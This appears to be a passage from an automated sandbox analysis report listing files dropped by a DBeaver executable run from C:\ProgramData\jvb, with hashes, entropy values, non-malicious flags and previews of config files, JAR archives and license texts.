      Entropy (8bit):4.5827162166773485
      Encrypted:false
      SSDEEP:
      MD5:E2CE2DE3E945568C161920CFBA21E8CE
      SHA1:ECBC1166154ECD3973EE0F5EB48C4EAABF286AF7
      SHA-256:158BD56BC5E5B516A03566896CF24877FA56623C0A16C54C6C7561E47D1F9DBE
      SHA-512:246E8A6A18194B9CAAEBCD8FAFB8739490FA601EE83F973DB174A4940A30E548A49473581CA34F9BFAAF5FE5901833992A530982B0039A87E3645FCE4FBCDA32
      Malicious:false
      Reputation:unknown
      Preview:eclipse.preferences.version=1.repositories/https\:__dbeaver.io_update_ai_latest/count=1.repositories/https\:__dbeaver.io_update_ai_latest/enabled=true.repositories/https\:__dbeaver.io_update_ai_latest/nickname=DBeaver AI (GPT) integration.repositories/https\:__dbeaver.io_update_ai_latest/uri=https\://dbeaver.io/update/ai/latest/.repositories/https\:__dbeaver.io_update_ce_latest/count=1.repositories/https\:__dbeaver.io_update_ce_latest/enabled=true.repositories/https\:__dbeaver.io_update_ce_latest/nickname=DBeaver CE update site.repositories/https\:__dbeaver.io_update_ce_latest/uri=https\://dbeaver.io/update/ce/latest/.repositories/https\:__dbeaver.io_update_debug_latest/count=1.repositories/https\:__dbeaver.io_update_debug_latest/enabled=true.repositories/https\:__dbeaver.io_update_debug_latest/nickname=DBeaver Debug extension.repositories/https\:__dbeaver.io_update_debug_latest/uri=https\://dbeaver.io/update/debug/latest/.repositories/https\:__dbeaver.io_update_git_latest/count=1.repo
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):48
      Entropy (8bit):4.079448698502606
      Encrypted:false
      SSDEEP:
      MD5:F8171A49945169B4D3DCC88C11D0CB8C
      SHA1:A1A408C37E9E6F4C0B66DD0BA5BD9A8A23810D6F
      SHA-256:532F13FEFAB8137E0EB26BF3E00702DA1AC3E9A6DFD73186601D84110C10F7DD
      SHA-512:C40F75D8C80EAB5BB85E194EFFBF7EB081264544B2BD42C792AC0010FB542F8A9103DC804F5FFA145FBAB6E23EF41D36F571E0AEF2C6203AA1D1F084BADB4362
      Malicious:false
      Reputation:unknown
      Preview:eclipse.preferences.version=1.trustAlways=false.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):50
      Entropy (8bit):4.292180011265246
      Encrypted:false
      SSDEEP:
      MD5:2936DA2A772CFCA506A643A8D818EA34
      SHA1:D190749F16CB3B49E4EBFDB7633E6D5EAA36C390
      SHA-256:F627A81597DE826987D53F95C328AF1F9A1D3695A3CBBD46DBDCD963B84BA4F4
      SHA-512:C53FBD90041FDD08C82CD9528130B064E9C75F74D2E26106B964B88EA216689C210EC907F2761D2908F021E607ABD1F5F2CFC7BD4ECC2E20F2CEE99E57F6C62E
      Malicious:false
      Reputation:unknown
      Preview:#Sun Mar 03 20:42:48 MSK 2024.-Xmx=1024m.-Xms=64m.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:gzip compressed data, original size modulo 2^32 895
      Category:dropped
      Size (bytes):363
      Entropy (8bit):7.354172796066891
      Encrypted:false
      SSDEEP:
      MD5:F452BE6DD33050190BD3F516A96B4FCF
      SHA1:44F5C8C3D7410717F2F002D912A35EE1CDC16358
      SHA-256:2FF9C4E8ADAE7375B5D5F59BF747AE5DE9FA3FE42A98375793B30C3E17A5F4B1
      SHA-512:8799F701D70A2C9295F9FE798817E24E32A0558875ACC1822A3A042DD0221E4F4D9B0636CD4ACA2B8C0952E0413F837F0BDE3479AAA928E313A07AB476CB9F09
      Malicious:false
      Reputation:unknown
      Preview:...........S.N.1......FZ..0a 1....&.s...e.....y...r.....w.8I.T`..*C.x..PL.\..Z...S...f.c....1.....x..%.h....P...4.a2xL...x8JS4.%.....\..;d...9QTF\.....8.....'l..Q..I**B4".......m.Z.9.#.'...%..k.`......Q....o-Hb.<0O..2(...S[...G...J..n}0..p.x.j4l..t...]lD...LN=.(.S!......Lo..$.>YMe.._B....J...R.+8....../j.>kD7..V"..Y..2{...yl....\.z\..n.....:-....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:gzip compressed data, original size modulo 2^32 896
      Category:dropped
      Size (bytes):367
      Entropy (8bit):7.373600934132075
      Encrypted:false
      SSDEEP:
      MD5:467341641A09D06C146EF6D7D23849B8
      SHA1:45DCCF6A9EF7424B7817D66225934D25B4C6CD66
      SHA-256:227F9AFDD9DD68A68E4B537BC8DFE0440594AA26A8D43B1AAF38F516936D3164
      SHA-512:9C13F53CF1AD3F4A47F0B8F50CE869EE39A0144BA7AA11412175823CE8B61C9FDC0F22C5F09A538C4BCAABEFE779B41286C818CED59F2593140D2DE2F8E1942D
      Malicious:false
      Reputation:unknown
      Preview:...........S.n.0......Rl.4....B.+....L....K.~}M.(..c/...lo.3_...j0.k..G<B.(.3...m....-....2:..nL...)..h.9.......`..Up.....l..'I...(:{V`...Y..)zj.+s.........,`..\.#..Q..Ij*|0"55d....nwZ....KV/@C.+...U.e..6d@......$..<s.i)...D.5.....\......3m.....&..<&.6.....]..2.......s.......x.K..}2..0.K...{o.P57ZIP.Z........E.....8..J.....;.w.Xk............!..,..Z..p....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:gzip compressed data, original size modulo 2^32 1826396
      Category:dropped
      Size (bytes):108791
      Entropy (8bit):7.996518369873984
      Encrypted:true
      SSDEEP:
      MD5:12C16A2C8D8B6413D9E08349A096FE41
      SHA1:A120C47FF20BC5E4FB61137ECFFB9923481F16B1
      SHA-256:8B4DE6203B0DB8C6C97CD7B469B3D7AE3530F3ACFB0C6C63EE2D53D343A20095
      SHA-512:DCD0579861DF3DE9BC54963E2FFF7A37F38A50326D4C42E5F8C144DE4EC371563A7ABEB4FB77009AF3E35A8710EC8E0016E06F6385FFF4B7B4221B079E5C77AA
      Malicious:false
      Reputation:unknown
      Preview:............r../..y....V.*..?gV.....x......Zuk."!..ErH*.....I..'....@..H..I..je".._.........q...I.....M..1.o...O..r.q...........`.z..*.L..r..o>..5.k...S.'.4....N.........7......eH..%......o...7O.oM.y.MLb{n....5s......m......f...w+..J.o...y.L...`..}..X.....K..?sF..M....[.Z....`;3;...t...^bE..d_.{.....86..v..3...........g...-n.,t......<sL.d..8of..H.:.....B..$....A..n..S.'s^.x.A...u.}."..=o5..P......./.-.Si|.<....z<kc....0p........}...&...ko>b.g.l6v..'...p....W..S...=b..~.O<..G\%..9..]'..........k..e}...-~.......L..7kB2.......`oIz...N.SE$.M.cM;z...tbwb:.T1.8....h..<1.k......G.BVYo...z..L...L...,..4p.g&O.j.H"..A4U...,q=.oW......F..G.Y.:....(.9.ahSQ..].....2*.W&Mk....y#x.eR`..3..G.=...FA......U.g>S..NTN=T.P.`..=5..o....Q......N..R.:A..hA.W_- 5..P.Hb.'..(.w..:....Ol..|O.n...z..E.@.Su3......K%B.1.*..(.eN..A.._..q.......... .....F......x...BK.l3<..z.e........5.'..Tg9......e..X........g.!.q#X...I..l..Q.7......C.r.....S'.....`..]^'DiD...M..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:gzip compressed data, original size modulo 2^32 1826395
      Category:dropped
      Size (bytes):108788
      Entropy (8bit):7.996703058481867
      Encrypted:true
      SSDEEP:
      MD5:3EE2BBBDB28CF83EC477BBE4077EEBF8
      SHA1:2562BFA3CBA536990A9AA3817E4B59A20BB9DEEB
      SHA-256:A3F85BAC9CDE866D96FE640FA02C0EF1F7ECD1F0BE8FE297C98646BDE8091172
      SHA-512:4EA93DE2267983FB85A405DC1454067F6C77C932A05A543D4AC4FD0804A52E36A975EC45473B12FC301BC78D35454F11ED92A506AAB62A93E5FBB846D47B39CE
      Malicious:false
      Reputation:unknown
      Preview:............r../..y....V.*..?gV.....x......Zuk."!..ErH*.....I..'....@..H..I..je".._.........q...I.....M..1.o...O..r.q...........`.z..*.L..r..o>..5.k...S.'.4....N.............a...!....F..M.....<..5..A41..aLL.....G3...e...w..K{.h.+.~..}0%{_.Q...'b...H.-.B....g.6.{..oqh...{....d.....&O{..MH.}..Qv.~s..L.c.AD....?...?...y...~...}...bB#....1..YD.I4#M..r..k.......w....?...........;.....y..........~.m....c.9 ....Y..`f...'.g.|P..3..7.@._{...>Sf..3<>...}.F.e~...Z.........C..>.[.......:........uX[.(.;n.&m...- O.g.?.Y..Qd.0.&..{K.{HLw.*".h..k..S............ID,.DcP.X#O. .l.>*...z....M`"0..d...g. ..C<3y.U.E.Y~<...R.0g......l..E05.6.?....q.RP@..A.C.....X...Q9.2iZ........k(......@<B...}7....../..f<..v.r.R.......!.|3.'....LX.}uJ.O.....F....j....l=..@..>I.D..+&..q.$.}b....{jt....(..2...q..`%._*....W..E./sJ..R....CW...v...V.A....6..L&.3V<u.0..ZJe....S,..N..TP&..=.<.:..|?H..._..u....>........DOj-f..._..1.|xF.N....l.VG.:IL-E...@..:!J#.l..l:..G.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):450944
      Entropy (8bit):7.854347270278738
      Encrypted:false
      SSDEEP:
      MD5:0037BBB9C5118584AFB076333F3706A0
      SHA1:BB0BE51E8B378BAAE6E0D86F5282CD3887066539
      SHA-256:07AE5704F3B729284B646643C798DB0984AF0126E646233FBD577B34DE69FDF2
      SHA-512:5E723073C81ABA72A5D9701625F316F0B252D1B5BBFEE00D25471EB7B2E1EAE0191E5344E3217C6C8C5F6E793C473F03682BE7D87BBCE0D72C7260C1F8902FB1
      Malicious:false
      Reputation:unknown
      Preview:PK.........{nW................META-INF/MANIFEST.MF........J..z....3V...=...R.X.r. ...9!..^H.....Yf..............*=....w}ZW.......?.....O.R.u..._...#....*.S..A.........A.....f.|....c...;..8.f.s..U.W...a.......?..).......:.....n..........+....l..j......dQ...f..(.......m.....0.O.........o.............?..........E......q..?>y....j\6j...m.e.7y.?y..=....G..q....._......3.....s....o.Q?|.6.O........W....z.g.../......8.i...)..s......;..._.q..........n.,^N.w~....8...OO..X<.M..K."..,....7...p...4....KY.H?..["7...7..........~e..-.6.u...<#..m.....;.8../....n.<y.I....~.?..P3..._.E..u....us../~x.6._i5....o.....c...;...._)........6?n..c.qW.?=...>.........a.....}...l.}..a.Jcw!.j..o..u..n.,x..#....... u.W..u./_....v...O.W._.z^..w..t.g...}...,=...1.....Y.o..2.O.h..8....~B....W..p._o.................=....;.."...yy .....'...w:.e.~C....?>.....yq..8.{.y.*.......y=.;._./..+......q^..E....~.X....B-.../...M...6......ws!...k...f?.8F..!..E.f.....C\..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):1113643
      Entropy (8bit):7.848654340342713
      Encrypted:false
      SSDEEP:
      MD5:0921C60F2C9ACC8D1066E01EFAB546F2
      SHA1:ED953791BA0229747DD0FD9911E3D76A462ACFD3
      SHA-256:1AC7FE8EFD5B2F38CDC165BE5A0675734FE44808DAB92707201F03A535D6F1B8
      SHA-512:AC5C081B5B11CEBA1857CFB9A5060497D3A2B666D99E9FF47DED73CAFD749A5A63CDF422A1BDB29E976471B96937C2F7D0C606BCB631150D31977A37E3540DBA
      Malicious:false
      Reputation:unknown
      Preview:PK.........EkW................META-INF/MANIFEST.MF......Y......"....c=.s.sJ!"k.~...E@T^NPK]W....b.1..}.s_f.M.h....U.....SV.jNQ.i..?........;r.T..L#......?L+..n.1....e%.....=|..%..0./..e'......j.N..H..I.......O.9.g.s..qk4.$...O~.7-...N.........a>o.7.Y.E.'.Eik..dj;.Q.s....E..dX..9.w..Q&..7o......B.....k....qk..i=m....6......g.uj..G...m.r.....yo_..(..J."..|.g..........x.......q......uy.k}zI=..Z[.H....s..qi.S..j..~.C...........W?...../.....9.>...<i.Z...6.so.. .......iYVFb...+o|.".+'r...!.#:W....p....t...x.....U.9..dh...r.g.._ymDw55=....g.....W...._.....(zo...5.....7..8.6.....s..0..xa........~.}l<`.[?#.....b..<..E.l...o.o|1.A.{.}^....W>.o.XF`......./?...5.....E..C?/6...u....S.......FC?#.....k...#..}.:.+.nh.._.h.*}....}...'..8.....y....]..uC.U..m.M...C..h...Y....>.:.W.X.[..<f....v..?.9_7..[.A..B.............9....h.....w.it7m..?iv...}m..-y...x.c...-..R8. ..Gmo..S.U..T..`..~..e..c.5.{......?.AwO.(.......u.....z$Gn:v.:L... ..t..|$......t./........D.}
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):899918
      Entropy (8bit):7.921164971724425
      Encrypted:false
      SSDEEP:
      MD5:584BC2D3004D9567FC1D413F5D8E4101
      SHA1:2CCFE4444A31CBFFE643706DDABC2A6E55F29B94
      SHA-256:AED9CE32D0B35EA2A61C0FC418BA472A8E7D9789F026782310C9788A061FA9DC
      SHA-512:217CA02498F55BD206CDD2166043CBBD94B86B7ADA844BA06F72A1654999872379ECBFABAB9D8D82D7160D987738F0E97C8F9E78994ED3A7CF0425104B815964
      Malicious:false
      Reputation:unknown
      Preview:PK........d..T................META-INF/MANIFEST.MF.....[Ko.8......rX.@.8i.)z.vsh....u.H..,......w..eQ.[....=...Cr..7.*.$gsZ..7Z....x69z....R.."esFSx..........7..@`.t.)......_...|.~{..../O3:...I.J.........UT.:"yt..&.9.tEs...W$.3x.1.M."..""..T.r.....y$Q.....Q...F.....iO>.i.(h.r.....f.".0..../..pN.<..~.....*Zr^^..n6.x...Z.f..4[...<>..|...EI.3.dI..7.?\....1..?.n...../.W..........lm...oW.....&.*^0.\?...?2a..F...z.._.....*...>...D...Q#..e...'G.OeQ...I..., .<...c.TV.F.o.`..w..2'9zH?0.JtlQ.1.`w+.Yr...4..%E.2.C..F..T4#.&.n...5.jE./pM.n..q"..s.Q..N...M.....?.@.p..N.......c..9......z.0....C..0..c....st..^..h2...5d...h:.....y...C..+et.B..Q.7.1.I..f...i'.6...yb......s(....+V.....>.-~ ...R.6#vg..N|...v...M~`..>2....N.h......(m..O4Y[.,...>A|..1 .......0.wB.-3b.~..6M......j.'D.y.Vn].:...~...F.dkZ........0..r.T?AM.Xk.S.[..&.......J\.F$..N ....u0f.`;.h...L.h....\b....RD....Tc...N$'..p:.b..<.NL8.G'.f.V...).....D...F(.H\....D......K.9/.N$..M.t"q..]0.H\...O..*.C
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):316006
      Entropy (8bit):7.885132670080764
      Encrypted:false
      SSDEEP:
      MD5:F7A94E2FB06B851B5F3E29A71865FC92
      SHA1:ECDD554EBF0A3DC9FAA136EEAB41C71E9B57A34A
      SHA-256:84DB9A060073D979F09754852FAB368836E8712D76E4DC1D72DC17CBF5F4171F
      SHA-512:55248CDDA6760DE2EE59AC664D6B56227956FD6D101231199E41D9B01F657CDD9A86AA1BC3B71D34725757EB6D148E6CB0CD9A816168CA622A1174193838B0D7
      Malicious:false
      Reputation:unknown
      Preview:PK..........8V................META-INF/MANIFEST.MF..Y....&|.@......=.I.......I..].8.......V............'..."..{...6).?.A.._.......=9...j.wd_.Y.N.....I......'...}.... }.W..............T.}..?.y..;..?.e.g.-_.}..=U...w. h............{..........o..{e..|....,........fe...wo...l.e.....o?3....>qq...w..'..f~.k..75.G.....a....m_..5|......,)./H....o?,l...#- r.sZ....>tc../........_.I...^.......}..3.~.2s....,...x.....>........:%...RT.....o.,.....o..../3I.?.?.a....o..>-........F....tn..o//.Wn.Ls.$.~....>.^......"(..R}{.....u...... ...A..........+....T>$E.6...g|.....vM..gx....^G^.....~.?...o....6a.-R...[..2R..7_}"..K..G.|.d...f>...e.o......=.Fn.H.r.>.G..7.e......?..._.[FzB...^%...gG.r...=.....EQv......?.....#}..7?........z...<.o._.....B..|.?.y.~..H...../#}.......v...^..1.e../...._...\FZ~...<i..,@..^=........~.E..Y.V../..e.....$q.|.M../..g>@.......>{.Om....q..._........G.%Y.-.m.|...DI..`. .....g..9....'......-*../...WN....%...#..C.I..?.....R?..o
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):4740
      Entropy (8bit):6.807260622886588
      Encrypted:false
      SSDEEP:
      MD5:3F75955B49B6758FD6D1E1BD9BF777B3
      SHA1:C4A06A64E650562F30B7BF9AAEC1BFED43ACA12B
      SHA-256:8A8F81CF9B359E3F6DFA691A1E776985C061EF2F223C9B2C80753E1B458E8064
      SHA-512:FF4EE76AA661708989D53D45576CFF3BEEA9EBBD86481DBBF2EE8C81BB22F882097B430588312B711025F0E890F22C6799D722CCD422A6A7278DE08660FE2F51
      Malicious:false
      Reputation:unknown
      Preview:PK.........iQW................META-INF/......PK..............PK.........iQW................META-INF/MANIFEST.MF..Mo.0............$]..E.i..-..h..e.v.*.gQI..G..u..-..."..F..(...S.$0..~o...$.,Z..k.......N.....w..OJ..d...P..6R.{7&.V...T.0g.......t:.]...+.Gw.S..0c.8.39g{...UE...5$.q..... h..'1.<..?H..3.2t.....W.'`m..w|.p`......7.@6....5.Bf$..ZqZ:.....aE^j}..H...l.....7.zb.._..2-.!;I..{...l..s.....A.....T.4'A.....el.V..XN.r....W...=....V....jlo..#.X.......,......\_........*.-Q.8.Y.OC..}q...].Jeh....p8...d.Ea.2......~..&b$...i..1.t.vt...6...C...w.e...AS.(Z.l@]..+%X.=.........r..Z.x..M.X\.{.....=..I...{W.6...;.....{.o^..-.VS.....J%....92.>.....].q]..p......9......sV:.M&...b|>.....PK.....?T...Q...PK.........iQW................META-INF/maven/..PK..............PK.........iQW............ ...META-INF/maven/com.google.guava/..PK..............PK.........iQW................META-INF/maven/com.google.guava/failureaccess/..PK..............PK.........iQW............<...META-INF/m
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):3043932
      Entropy (8bit):7.8810996705428105
      Encrypted:false
      SSDEEP:
      MD5:ADC3CF557A48D15CB71BE90948558923
      SHA1:0F306708742CE2BF0FB0901216183BC14073FEAE
      SHA-256:6D4E2B5A118AAB62E6E5E29D185A0224EED82C85C40AC3D33CF04A270C3B3744
      SHA-512:F575321AA79046F2C12BDF9895DB7E235CBAAA8E913389AE48EC4BB5F387D6BF066ED98C5F2C7854BF0C56BB38B59B005CA3C16D68E314743491A223A18CEE47
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.VMs.0..{..A..3X|.i...$.t..4..^z..b..+...}W.kH.....k..oW..L..h......>...\dF&.....0...c..$.....b..7..u.3...m...R....D..o...S..~.....#:...\ ...DH`....$.s...M..u.3.. .B .d...lH.3.Aw..\.G.Dq..M.oo.?.!H.<.I.`I..H..e..a.1.....e6..u.*..U......P ....LY.%P..n\,......nv..h..........A.T.....+...d!.....3.$s.I.....l....!}T.:W......."/.L...)@.>."..gD|u..u*...Y..C.@......U.p.*..:e8vb.1g..BG...[.X.z.....Sr.Vx-.J.s.<.J9B.}..;./.L).../....V..E..x.w..2...K.*G........y.....;.b..X..s.Fj.L.....G.w..4I......\V.."...E.s....k,...x..7.0...Q....z.O_....>w..I.O..+.?{ve...};B.bg3#O...W.e..yN%~u....y..v.u.}.*!...,nd..K....:7..L...%....^g.n..).2...X.w...!.>U8;.j..y.V...T..p...........3....K.<...D.S...X .v..|7._..u..n.6....O)c.\..;..{..z.A...?.....PK...(X.........PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n&..%. ..... ...=....dw.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):185824
      Entropy (8bit):7.96459851796597
      Encrypted:false
      SSDEEP:
      MD5:D5C32A52B19CA6199D0AF57CEACDFA95
      SHA1:9741CB054F465CC22D7062465229DA776D0E43BF
      SHA-256:3BC16C4B3A39FA2727673440826B86153450759B3969D743AE077FE41DD01E9E
      SHA-512:CE6F994115F6B80D10E6667DA095A58FD378F434B01EC6D8F5F335D912C96EE2311CDF97780BEBDED9DC8AA83C7A998ACA67EF35EB8FF28C7737D906B5CBCD0F
      Malicious:false
      Reputation:unknown
      Preview:PK.........}.N................META-INF/MANIFEST.MF.....SMo.@..#..VT.l)..m......(..X.Z.1....e......$nR.....{o>.l..{......ZE$.....*...E....Y..."...4a...W.s.yA?Hh......=F$.%.j..;.l...?.C......^[...F......k...C....]...r.N6S2...a*%.Y0.....)\.o..S@..e)...T.:....."zO..[.-...p8..c....hn...'...'P.F....?]g....%B..C.U&(.j.S.*...j2.[.=N'M?.56;.z..s)...{.....`...(...6..`..e.-L..\..P(.....du...,...5Bp..(*5g...<"..<6....s._.[h.?r;.N..R..El~A.F..?=1.[.{.]9.....6..M...Yi....>.K?\~.q...t_z...6.C.#pQ.....M..x.sI....;.%.~..<....PK..............PK.........}.N................META-INF/PK.........}.N................META-INF/maven/PK.........}.N............)...META-INF/maven/org.eclipse.orbit.bundles/PK.........}.N............:...META-INF/maven/org.eclipse.orbit.bundles/com.ibm.icu.base/PK.........}.N............A...META-INF/maven/org.eclipse.orbit.bundles/com.ibm.icu.base/pom.xml.T]o.0.}.Wxy....:&U(MU.Vc*m.t....].d..t.~..!..H..s.=.>Ir..3..].B]FC.G../.T...iy./......x.n...o gw.g.7
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):1322609
      Entropy (8bit):7.937428897983846
      Encrypted:false
      SSDEEP:
      MD5:039CAA0764A2BC621202783C4FAA584A
      SHA1:FBC035887BDF469E39D32F585B0DE6FC52B73E0C
      SHA-256:1C93A2166BD209F18DD3E55B0D2529533F030C784F315CD0C1EE8F26D0E05ECD
      SHA-512:7850C3AEFDE7B99EAF77A8889F029F75C32BF07FAC4D4E8BF7C6231714B3E5FB4C479137F97E0E962C4AA2482262145D0472E0330543EB35DC21106CDC772A83
      Malicious:false
      Reputation:unknown
      Preview:PK..........uV................META-INF/......PK..............PK..........uV................META-INF/MANIFEST.MF..Mo.0.....,.S....F'....VT...v.N..$.:vf;m.....J.e.Ny....y...r.&..J3)...;.7Q@.d.x5@_*B........".ny]0.>....{..,.e.aR...K.so,g..K...0@.......;8.....P.0o......y......VcT..5.o..4U.2k{GCL#..Z...G...6.9J.oq..f....... ..f.u..,..A..R.E.r.F%..Tt}5..$Sl.M.|._......@.......D.*..M,.m....!e...dU..3.9.w.%U$7...X..b.\Ie.[B.H.Z7|..Zk.../.R.....sY.^+...r.........-y....fG..Lx.....]Q.....\.=D._.A|...-.(.g.....,.7.....CY..p...1R.O..w.KB.....i.........".....Ya3...i..t...|.}.L.......r..k.....^...#d.._5S.n.o3][H...+NL.U..L.P..3c.......q.3......[..}..'...m;..R....,....q'.;..e........PK..0...Q...P...PK..........uV................META-INF/LICENSE.JZlib.txt.SM..6...W.-.B.z...DK..@.\.Zg{.V.c.....]...Q.......#.g..>.....%...z7...t.v..c......(_nr.lczg....f.QA...{...(..B.@5.Uv...3.....}.tx=........g......N...>.c...X..t.A.3.i.(.........S.C.3d{r.ql.t.b.z<.n.......0N...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):1363209
      Entropy (8bit):7.87611362696644
      Encrypted:false
      SSDEEP:
      MD5:7CC7AF47AD1F151FAA57EF0624B2F271
      SHA1:88E9A306715E9379F3122415EF4AE759A352640D
      SHA-256:474D7B88F6E97009B6EC1D98C3024DD95C23187C65DABFBC35331BCAC3D173DD
      SHA-512:DDFCE8060983B3BF73AE939F7F77F133052AADBE4D3E9D1992F1D8BF9C7210611BF3931EA72137059BD1341A8D4D137910E843C3A52FA50526E21143319F078E
      Malicious:false
      Reputation:unknown
      Preview:PK.........j.V................META-INF/....PK.........j.Vc.7sP...........META-INF/MANIFEST.MF..Qo.0...#.?X<u..H.M....x....U_'..]bg.C....i.v......{l.+"...:xd*.R.Q.G.7...iF./.`.6...#.)F4......G?..Q..G.j..L.eL,..>...4KX.&.h.....#*S...?.....T....X.1Z..h..,...D.....O8...c;..Q........Z.......9.......m...."NX0.........WWU.uATo.I...o.T[s.S.3.Za..W...o.Q.Z.9.[.pZ..9W.Vd...........i..{..0.C.h..B..........d[.....A.c.{.C&.....M...:.]7)r..o.'..0..Z...u4.Z.8.q...W.C.pQ..5.%...).?..).m6plx+..pH........;....D7..s.)g.l..\&D.F.|......Y.....vG_......U...............DL.._...k.....J'.....XvTc.f.6....I....Nk..s...\.{y....g.>G....~&..V.........r3(sf..~1...%).L.?.V2.._K.=.PK.........j.V................com/PK.........j.V................com/sun/PK.........j.V................com/sun/jna/PK.........j.V................com/sun/jna/platform/PK.........j.V................com/sun/jna/platform/dnd/PK.........j.V................com/sun/jna/platform/linux/PK.........j.V................com/sun/
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10174
      Entropy (8bit):4.3908324771089084
      Encrypted:false
      SSDEEP:
      MD5:2EE41112A44FE7014DCE33E26468BA93
      SHA1:598F87F072F66E2269DD6919292B2934DBB20492
      SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
      SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
      Malicious:false
      Reputation:unknown
      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):24389
      Entropy (8bit):4.6062963734154225
      Encrypted:false
      SSDEEP:
      MD5:68AD62C64CC6C620126241FD429E68FE
      SHA1:39A21F33CADEA18ADCC23BF808D7D5EA6419C8B1
      SHA-256:EEA173A556ABAC0370461E57E12AAB266894EA6BE3874C2BE05FD87871F75449
      SHA-512:3946C233FA248B8BB8A04445045A0DE9BBE6CAB315C3B39CB5372B5FB3DB59706150A0E8C930DF8F6AECF128DA8619B8DE7CF19D78D8DA26720C247325F55CA5
      Malicious:false
      Reputation:unknown
      Preview:.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we su
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):788
      Entropy (8bit):4.829747150482093
      Encrypted:false
      SSDEEP:
      MD5:4EF971EF4040403849E89248ABAF2F02
      SHA1:DA8F029812C17AF115FCB73FD811182E08D36E9C
      SHA-256:521BB271AC56E0E29A1B1B688B94AF17D00D378FC8E63478D8C8B2A7C4A229D0
      SHA-512:5489FC61F19793A5EDAD7B6BB14CC05C7DB7A2ADAFEFE7B5A07A4800B53F5298A56DD5AD376434D036B87871C1522D1F8A423DAF07ECCDC817B945E373C13AB3
      Malicious:false
      Reputation:unknown
      Preview:SPDX-License-Identifier: Apache-2.0 OR LGPL-2.1..Java Native Access (JNA) is licensed under the LGPL, version 2.1.or later, or (from version 4.0 onward) the Apache License,.version 2.0...You can freely decide which license you want to apply to the project...You may obtain a copy of the LGPL License at:..http://www.gnu.org/licenses/licenses.html..A copy is also included in the downloadable source code package.containing JNA, in file "LGPL2.1", under the same directory.as this file...You may obtain a copy of the Apache License at:..http://www.apache.org/licenses/..A copy is also included in the downloadable source code package.containing JNA, in file "AL2.0", under the same directory.as this file...Commercial support may be available, please e-mail.twall[at]users[dot]sf[dot]net..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3647
      Entropy (8bit):5.047741311569585
      Encrypted:false
      SSDEEP:
      MD5:19EB9E5E554795450B2BC26863896ED3
      SHA1:25F14CC9442DA9E324523DE03EE014BC54A410F5
      SHA-256:C8B3FCC09CBC297EADAC14D69A70782BC1380BE8C629EA614935BF29EC61241D
      SHA-512:9C877A596514E313159F934331177F4A8FA4BF5B0B7D9A4581251A1559A8106E5CBB133C2D6D5791770E365C69CD22A931D9A85AC99C865EC25269BDD832DC03
      Malicious:false
      Reputation:unknown
